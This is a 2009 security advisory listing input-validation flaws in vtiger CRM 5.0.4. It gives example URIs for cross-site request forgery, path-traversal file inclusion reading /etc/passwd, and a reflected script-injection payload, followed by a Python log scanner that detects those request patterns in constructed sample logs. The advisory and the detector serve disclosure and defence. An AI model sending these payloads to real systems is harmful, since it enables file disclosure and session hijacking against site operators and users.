Title: vtiger CRM Multiple Input Validation Vulnerabilities
Published: 2009-08-18 12:00AM
Updated: 2009-08-21 08:23PM
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Credit: Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata, Francesco "ascii" Ongaro
Vulnerable: vtiger vtiger CRM 5.0.4
Not Vulnerable:
Code:

An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI. The following example URIs are available:

For the cross-site request-forgery issue:
http://www.example.com/vtigercrm/index.php?module=Rss&action=Save&rssurl=http://www.example2.com

For the local file-include issues:
http://www.example.com/vtigercrm/graph.php?module=/../[..]/../etc/passwd%00
http://www.example.com/vtigercrm/index.php?module=Accounts&action=Import&parenttab=Support&step=/../[..]/../etc/passwd%00
http://www.example.com/vtigercrm/include/Ajax/CommonAjax.php?module=Email&file=bar

For the cross-site scripting issue:
http://www.example.com/vtigercrm/phprint.php?module=Activities&action=--%3E%3Cscript%3Ealert(%22example%22);%3C/script%3E%3C!--
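As an added defender-side example (not part of the advisory or of vtiger's own code), the Python below scans constructed Apache access-log lines for the three request shapes the advisory's URIs describe: traversal or a null byte in the module, step or file parameters, script markup in the action parameter, and Rss Save requests carrying an rssurl. The log lines, client IPs and finding labels are constructed; the Rss rule flags every such save because the advisory shows the action accepts an unauthenticated-origin request, so matches should be correlated with the Referer before alerting.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Apache combined format, trimmed) -- not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2009:10:00:01 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 512
10.0.0.7 - - [18/Aug/2009:10:00:02 +0000] "GET /vtigercrm/graph.php?module=/../../../../etc/passwd%00 HTTP/1.1" 200 88
10.0.0.7 - - [18/Aug/2009:10:00:03 +0000] "GET /vtigercrm/index.php?module=Accounts&action=Import&parenttab=Support&step=/../../etc/passwd%00 HTTP/1.1" 200 88
10.0.0.9 - - [18/Aug/2009:10:00:04 +0000] "GET /vtigercrm/phprint.php?module=Activities&action=--%3E%3Cscript%3Ealert(%22x%22);%3C/script%3E%3C!-- HTTP/1.1" 200 300
10.0.0.9 - - [18/Aug/2009:10:00:05 +0000] "GET /vtigercrm/index.php?module=Rss&action=Save&rssurl=http://www.example2.com HTTP/1.1" 302 0
"""

# Pulls client IP, method, request target and status out of a combined-format line.
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# Parameters the advisory shows being used as include paths.
TRAVERSAL_PARAMS = ("module", "step", "file")


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.startswith("/vtigercrm/"):
        return None
    # parse_qs already percent-decodes once; decoding again catches double-encoded input.
    params = {k: unquote(v[0]) for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    for name in TRAVERSAL_PARAMS:
        value = params.get(name, "")
        if "../" in value or "\x00" in value:
            return "lfi"
    action = params.get("action", "")
    if re.search(r"<script|<!--|-->", action, re.IGNORECASE):
        return "xss"
    if params.get("module") == "Rss" and params.get("action") == "Save" and "rssurl" in params:
        return "csrf-rss-save"
    return None


def scan(log_text):
    """Return (ip, label, target) for every suspicious request in the log text."""
    findings = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("ip"), label, m.group("target")))
    return findings
```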
Copyright 2007, SecurityDot
Wed, 16 Dec 2009 07:51:34 +0000